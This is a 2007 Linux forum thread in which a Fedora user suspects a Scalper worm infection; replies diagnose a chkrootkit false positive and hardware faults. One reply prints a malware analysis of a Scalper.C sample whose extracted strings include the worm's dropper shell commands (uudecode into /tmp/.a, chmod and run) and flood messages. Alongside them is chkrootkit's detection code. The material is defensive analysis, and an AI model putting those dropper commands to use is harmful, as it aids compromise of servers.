LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Hardware
User Name
Password
Linux - Hardware This forum is for Hardware issues.
Having trouble installing a piece of hardware? Want to know if that peripheral is compatible with Linux?

Notices

Reply
 
LinkBack Search this Thread
Old 06-23-2007, 03:04 PM   #1
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Rep: Reputation: 15
Scalper worm, Fedora 7


After a lengthy process of trying to identify the cause of crc error and coincidental "chkrootkit" report my Clevo laptop was infected with the "scalper" worm, I came to the conclusion that the source of the crc error was incompatible ram. I am still at a loss however, why chkrootkit reported the infection, since the scalper worm affects only BSD and my system is Fedora. The comments below are now for historical reference in case someone else has a similar problem.

Question: How do you get the "scalper" worm written for BSD when you are running Fedora?

Possible answer: Own a laptop computer with a nifty built in webcam you hope to get working. Google the web looking for programs and drivers to make it possible. Download a program in source code that won't compile without other files required to satisfy dependencies. Go looking for the necessary files and download them from the web. Extract and install. Grab a driver too. Oh, did I fail to say some of the files are BSD .rpms? So what, they are rpms and install without any complaint.

Next time you run "chkrootkit", lo and behold - it reports there is a "scalper" worm installed. Maybe. Or, it may have been something else incorrectly identified as the "scalper".

Consequence? Following the next shut-down the computer will not boot. Attempts to use the rescue disk fail. Don't know what to look for anyway. Using the install disks to attempt an "update" don't work either, even though my objective is to simply update the boot configuration. Doesn't work because there is no kernel update required. Shouldn't be some way to force an update or simply change the boot configuration via the install disks. Maybe there is and I'm revealing my ignorance.

Tried a new install without formatting the "home" and "Keepers" file systems to save files I didn't want to lose. Result? The installation always failed at "post configuration" and installation of "grub". Tried using a "System Rescue" CD (not the Fedora 7 rescue CD) to repair the boot and file allocation tables. Unsuccessful.

Employed a "freedos" CD to delete the Linux partitions (consequently losing my aforementioned files - if I can't use a file recovery program to save them, and if they haven't already been written over). They aren't critical files anyway. Just music and such. Running "freedos" from the CD created a DOS partition, reformatted, installed the sys files and "freedos".

Using the "System Rescue" CD (not the Fedora 7 rescue CD), deleted all data in the F.A.T., installed an empty dos F.A.T. and using the utility saved "freedos" into it.

Finally managed using "freedos" to enable one of the two disks to boot up. Maybe I can get Fedora 7 to install now. Pending. Update to follow.

svarmido

Lesson(s)? Lots of them.

Last edited by svarmido; 11-14-2007 at 12:31 PM. Reason: Update
 
Old 06-23-2007, 04:25 PM   #2
jschiwal
Guru
 
Registered: Aug 2001
Location: Fargo, ND
Distribution: SuSE AMD64
Posts: 15,733

Rep: Reputation: 654Reputation: 654Reputation: 654Reputation: 654Reputation: 654Reputation: 654
The scalper worm is an internet worm that exploits unpatched apache web servers running on BSD. I doubt that it would cause the problems you are seeing now because you are trying to reinstall from read-only media. Unless you have a virus that infects the bios, reformatting and reinstalling will eliminate anything you had before. You may have drive or media problems instead that led you to the wrong conclusion. You might want to post the url of the bsd rpm file that you downloaded so that someone can examine it. Theoretically, if that server was compromised, a hacker might have repackaged an rpm with their own version. It installs binaries after all, but the signature of the rpm will change as a result. So the hacker will also change the signature, but it won't match that from a 3rd party source.
 
Old 06-23-2007, 06:21 PM   #3
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,524
Blog Entries: 51

Rep: Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601
Quote:
Next time you run "chkrootkit", lo and behold - it reports there is a "scalper" worm installed. Maybe. Or, it may have been something else incorrectly identified as the "scalper".
Like jschiwal said: most likely Something Else. From chkrootkit-0.47a:
Code:
scalper (){
   SCALPER_FILES="${ROOTDIR}tmp/.uua ${ROOTDIR}tmp/.a"
   SCALPER_PORT=2001
   OPT=-an
   STATUS=0

   if ${netstat} "${OPT}" | ${egrep} "0.0:${SCALPER_PORT} "> /dev/null 2>&1; then
      STATUS=1
   fi
   for i in ${SCALPER_FILES}; do
      if [ -f ${i} ]; then
         STATUS=1
      fi
   done
   if [ ${STATUS} -eq 1 ] ;then
      echo "Warning: Possible Scalper Worm installed"
   else
      if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
         return ${NOT_INFECTED}
   fi
}
This shows it'll trip on either a) TCP port 2001 OR b) any files called /tmp/.uua or /tmp/.a . In the case of the TCP port reliance on static port-to-service mappings (Nmap's services file or /etc/services) isn't infallibe. Looking for open files for that PID and Interrogating the service should show more info. If you haven't been running a stale version of Apache then I doubt it'd trip on the /tmp files thing. In any case the chance the probs you're experiencing are linked to anything in the Scalper MO is zilch.
 
Old 06-23-2007, 09:31 PM   #4
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Original Poster
Rep: Reputation: 15
A mere coincidence?

chkrootkit reported an installed scalper worm. Then my laptop failed to boot on the next attempt. Subsequent attempts to reinstall Fedora 7 failed at the point where "post-install" and or "grub" install occurred. Once, the new install appeared to have succeeded, but the next boot stopped with nothing appearing but "grub" and a prompt. Accepting there is no correlation between them is hard to do. Unfortunately, deleted partitions and reformatting will make it difficult, but probably not impossible if they have not yet been over-written to identify suspect files. I feel somewhat responsible to try - but admit a lack of motivation. I downloaded the "spca1" driver. I downloaded a gnome conferencing type program similar to Ekiga that required compilation and had lots of dependencies. "conference?" Every attempt at compilation, after downloading and installing a dependency only mentioned a new missing dependency. All missing dependencies were not mentioned at the same time. See this post: http://www.linuxquestions.org/questi...d.php?t=561014. The only other possible variable is I used the "Smart package manager" to update my system and install additional programs during the session prior to the boot failure.

There were no apparent booting issues or other warnings prior to this.

I use Clamav, rkhunter and chkrootkit regularly. I check logs and messages for possible anomalies regularly.

Thanks for your input.

svarmido
 
Old 06-24-2007, 03:58 AM   #5
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: None (src & compile)
Posts: 253

Rep: Reputation: 36
Unless Fedora has a program interpreter
/usr/libexec/ld-elf.so.1

this binary was not running. You didn't say the Scalper variant, but I'll assume they use similar dynamic loaders.

Code:
[jayjwa@atr2:~>] f-prot apch1.a -wrap 
Virus scanning report  -  24 June 2007 @ 4:22

F-PROT ANTIVIRUS
Program
 version: 4.6.7
Engine version: 3.16.15

VIRUS SIGNATURE FILES
SIGN.DEF
 created 22 June 2007
SIGN2.DEF created 22 June 2007
MACRO.DEF created 22 June
 2007

Search: apch1.a
Action: Report only
Files: "Dumb" scan of all
 files
Switches: -ARCHIVE -PACKED -SERVER -WRAP

/home/jayjwa/apch1.a  Infection: Unix/Scalper.C

Results of virus scanning:

Files: 1
MBRs: 0
Boot sectors: 0
Objects scanned:
 1
Infected: 1
Suspicious: 0
Disinfected: 0
Deleted: 0
Renamed: 0

Time: 0:00
Exit 3
[jayjwa@atr2:~>] readelf -S apch1.a
There are 25 section headers, starting at offset 0xb3d0:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        080480f4 0000f4 000019 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048110 000110 000018 00   A  0   0  4
  [ 3] .hash             HASH            08048128 000128 000248 04   A  4   0  4
  [ 4] .dynsym           DYNSYM          08048370 000370 0004d0 10   A  5   1  4
  [ 5] .dynstr           STRTAB          08048840 000840 00024d 00   A  0   0  1
  [ 6] .rel.plt          REL             08048a90 000a90 000200 08   A  4   8  4
  [ 7] .init             PROGBITS        08048c90 000c90 00000b 00  AX  0   0  4
  [ 8] .plt              PROGBITS        08048c9c 000c9c 000410 04  AX  0   0  4
  [ 9] .text             PROGBITS        080490ac 0010ac 0091f8 00  AX  0   0  4
  [10] .fini             PROGBITS        080522a4 00a2a4 000006 00  AX  0   0  4
  [11] .rodata           PROGBITS        080522c0 00a2c0 000ba0 00   A  0   0 32
  [12] .data             PROGBITS        08053e60 00ae60 000200 00  WA  0   0 32
  [13] .eh_frame         PROGBITS        08054060 00b060 000004 00  WA  0   0  4
  [14] .ctors            PROGBITS        08054064 00b064 000008 00  WA  0   0  4
  [15] .dtors            PROGBITS        0805406c 00b06c 000008 00  WA  0   0  4
  [16] .got              PROGBITS        08054074 00b074 00010c 04  WA  0   0  4
  [17] .dynamic          DYNAMIC         08054180 00b180 000070 08  WA  5   0  4
  [18] .sbss             PROGBITS        080541f0 00b200 000000 00   W  0   0  1
  [19] .bss              NOBITS          08054200 00b200 0044d8 00  WA  0   0 32
  [20] .comment          PROGBITS        00000000 00b200 0000c8 00      0   0  1
  [21] .note             NOTE            00000000 00b2c8 000050 00      0   0  1
  [22] .shstrtab         STRTAB          00000000 00b318 0000b5 00      0   0  1
  [23] .symtab           SYMTAB          00000000 00b7b8 000c40 10     24  51  4
  [24] .strtab           STRTAB          00000000 00c3f8 0005b2 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings)
  I (info), L (link order), G (group), x (unknown)
  O (extra OS processing required) o (OS specific), p (processor specific)
[jayjwa@atr2:~>] objdump -s -j .interp apch1.a

apch1.a:     file format elf32-i386-freebsd

Contents of section .interp:
 80480f4 2f757372 2f6c6962 65786563 2f6c642d  /usr/libexec/ld-
 8048104 656c662e 736f2e31 00                 elf.so.1.
Besides this, chkrootkit is known to have frequent false-positives. This variant also opens a "/bin/.log" file (or is coded to).

Some interesting strings:

Code:
/bin/.log
Invalid instance or socket
Operation Success
Unable to resolve
Unable to connect
Unable to create socket
Unable to bind socket
Port is in use
Operation pending
Unknown
webmaster@mydomain.com
.hlp
.gov
find / -type f
/proc
/dev
/bin
http://
Cookie2: $Version="1"
Cookie: %s
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
GET /%s HTTP/1.0
Host: %s
Accept: text/html, text/plain, text/sgml, */*;q=0.01
Accept-Encoding: gzip, compress
Accept-Language: en
User-Agent: Lynx/2.8.4rel.1 libwww-FM/2.14
HTTP
Set-Cookie
Location
FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)
FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)
GET / HTTP/1.1
Server: 
/tmp/.a
begin 655 .a
Apache
POST / HTTP/1.1
Host: Unknown
Transfer-Encoding: chunked
rm -rf /tmp/.a;cat > /tmp/.uua << __eof__;
__eof__
/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/tmp/.a %s;exit;
12.127.17.71
%c%s
HELO %s
MAIL FROM:<%s>
RCPT TO:<%s>
DATA
QUIT
Return-Path: <%c%c%c%c%c%c%c@aol.com>
From: %s
Message-ID: <%x.%x.%x@aol.com>
Date: %s
Subject: %s
To: %s
Mime-Version: 1.0
Content-Type: text/html
/dev/null
%s <base 1> [base 2] ...
Error: %s
Insufficient memory
%d.%d.%d.%d
Unknown 24-06-2002 APC
Unable to execute command
127.0.0.1
Unable to connect to host
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
/tmp/tmp
Unable to open temporary file for writing
Error communicating with website
Timed out while receiving data
UNKNOWN-CHECKSUM-SUCCESSFUL
Checksum for data failed
mv /tmp/tmp /tmp/init;export PATH="/tmp";init %s
/bin/sh
Size must be less than or equal to 9216
Cannot packet local networks
Udp flooding target
Tcp flooding target
Sending packets to target
Dns flooding target
Invalid IP
----FROM----
----SUBJECT----
----DATA----
----EMAILS----

Quote:
Finally managed using "freedos" to enable one of the two disks to boot up. Maybe I can get Fedora 7 to install now. Pending. Update to follow.
Your boot troubles are possibly one or more of the following:
  • Partition table setup wrong; possibly not marked bootable. Freedos probably does this itself, which would explain its success.
  • You didn't write a bootable kernel and/or boot loader to the disk you wanted to boot.
  • The boot loader's config was wrong.
  • The kernel you wanted to boot the new system off of lacked the compiled-in drivers needed to access the disks and such. Install kernels usually have everything but the kitchen sink compiled in, while the actual kernel you'd use to be the system kernel might lack these drivers.

In any case, it sounds alot like my first Linux installs, when I didn't fully grasp the lay-out Linux needed.
 
Old 06-24-2007, 06:29 AM   #6
v00d00101
Member
 
Registered: Jun 2003
Location: UK
Distribution: Fedora 8, Centos 5.1
Posts: 480

Rep: Reputation: 30
If all else fails, zero the drive and start again.

I doubt you have contracted a boot sector virus. Its more likely you have misconfigured something, or your hard drive was on its way out to start with. Either is fixable with time and a little new knowledge.
 
Old 06-25-2007, 03:50 PM   #7
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Original Poster
Rep: Reputation: 15
crc error

Update:

The computer is a D9T, a.k.a. D900T, marketed by several different vendors. Will accommodate two sata drives.

A clarification is in order. After noticing the report by "chkrootkit" that a scalper worm was installed and shutting down my system - my attempt to reboot was not a total failure. I received a message at the time, the only part of which I recalled was *****system halted*****.

Subsequently, after fresh re-installs (only one in the computer at a time) neither of two sata drives, one 80 gig and the other 100 gig to boot beyond this message, "crc error *****system halted*****, I grabbed my HPze4805us to search the net for other instances where this has occurred. 99.99% of them were associated with issues related to Linux installations. I didn't even use Linux or anything related to Linux in my search terms. Tired, defective disks? Overheating? Incompatible memory? One possibility mentioned is a defective .iso image used for installation. Other discussions were about the kernel and boot configurations - Grub and Lilo.

My install went well using an apparently good .iso image and install disk before this happened; and, since there were no changes (I am aware of) to either disk after the original installation - the installation disk and original partition plan are improbable sources for the problem.

Memory? I recently installed 1X2 gigs of Kingston DDR2 ram. There were no immediate problems I can attribute to the ram upgrade.

I removed both upgrade modules and the crc error issue remained. I did not yet try after removing the remaining 512mb module...

Overheating should not be an issue for a computer just turned on and booted...

So, I believe there are only three remaining issues to consider (an over simplification or unjustified optimism?). The just completed update using the smart package manager; other files downloaded, compiled or installed (rpms).

Then there is the chkrootkit thing. While attempting repairs to the F.A.T. using the System Rescue Program (not the rescue program included with the install disk), there was a report that the disk - 100GB showed only 93GB. Recommendation was to check jumpers, etc.... What jumpers? Besides, at that point I had only removed Freedos from the F.A.T. and not yet reformatted and repartitioned the drive.

Would it be unreasonable to suspect a virus or worm has managed to affect both hard drives - and remains installed somewhere on both, consuming disk space?

I wiped the 100GB drive using "shred" before re-installing Fedora 7. This did not resolve the crc error.

One last bit of information. After wiping the drive, I kept the home partition from the last install hoping to save files I prefer not to lose. Consequently, there was some unused space remaining between the boot and home partitions. My plan was to resize the home partition or simply do a new install after having copied the files to a CD. Must the partitions be entirely contiguous?

My bad?

The worst possibility is that the original cause has been compounded by subsequent attempts at resolving the problem.

Ideas and recommendations are welcome.

svarmido
 
Old 06-25-2007, 04:27 PM   #8
TigerOC
Senior Member
 
Registered: Jan 2003
Location: Devon, UK
Distribution: Debian Etc/kernel 2.6.18-4K7
Posts: 2,380

Rep: Reputation: 49
Download the disk manufacturer's diagnostic disks. They will boot independently of an os and run diagnostics on the drives. It would seem unlikely that both disks would fail simultaneously but you never know. It is also possible that the hard drive controller on the motherboard is faulty or the sata cable is faulty (swap out the cable(s) with new ones). These kind of faults give rise to the disks being incorrectly formatted and the file system would also be corrupt and therefore be non-accessable.

Last edited by TigerOC; 06-25-2007 at 04:28 PM.
 
Old 06-28-2007, 12:30 PM   #9
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Original Poster
Rep: Reputation: 15
more information

Thanks.

I'll fetch the manufacturer's drive diagnostic tool and report the results later.

Over the last couple of days I have experienced the same problem trying to install Fedora Core 6, Gentoo from a live CD or Fedora 7. The install either stops at the post install configuration, or if I was lucky enough to get grub installed - still received the crc error, system halted.

Output was:

"sb_read failed reading block 0x79b
unable to read page, block 1e1b3c, size 545f
SQUASHFS error:zlib_inflate returned unexpected result 0xffffffffd, src length 65536, avail_in 0, avail_out 2"

Other errors of this type vary in their output but are of the same type.

Install media checks out o.k.. Anyway, would you receive a crc error, system halted message if a cdrom/dvd drive was failing. I doubt it.

svarmido
 
Old 07-14-2007, 06:26 PM   #10
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Original Poster
Rep: Reputation: 15
Moving over to Software/Hardware Forums....

Moving over to Hardware and Software threads. I no longer consider this a security issue - which isn't to say the bios has not been affected by something I downloaded. Much else has been ruled out.

svarmido
 
Old 07-15-2007, 09:04 AM   #11
Crito
Senior Member
 
Registered: Nov 2003
Location: Knoxville, TN
Distribution: Kubuntu 9.04
Posts: 1,168

Rep: Reputation: 53
Quote:
Originally Posted by svarmido
Memory? I recently installed 1X2 gigs of Kingston DDR2 ram. There were no immediate problems I can attribute to the ram upgrade.

I removed both upgrade modules and the crc error issue remained. I did not yet try after removing the remaining 512mb module...
It's a process of elimination and thus far you haven't actually eliminated anything. Test all the memory with a LiveCD like Ultimate Boot or System Rescue. Then and only then can you declare "that's not it" and move on to the next possibility.
 
Old 07-15-2007, 11:36 AM   #12
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,524
Blog Entries: 51

Rep: Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601
Moved: This thread (by now) is more suitable in the Hardware forum and has been moved accordingly to help your thread/question get the exposure it deserves.
 
  


Reply

Tags
bsd, crc, error, fedora, incompatible, ram, system, worm


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Trackbacks are Off
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Scalper Worm Info Required --> Very Urgent chinmays *BSD 1 05-14-2006 08:35 PM
Is this a virus / worm? rioguia Linux - Security 1 11-17-2004 05:22 PM
**help** worm.somefool.p AnimaSola Linux - Security 3 05-01-2004 08:55 PM
beat the worm!!!! engnet Linux - Networking 14 01-27-2004 02:18 PM
i got Worm cinik thep Linux - Security 5 10-31-2002 08:14 PM


All times are GMT -5. The time now is 07:50 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration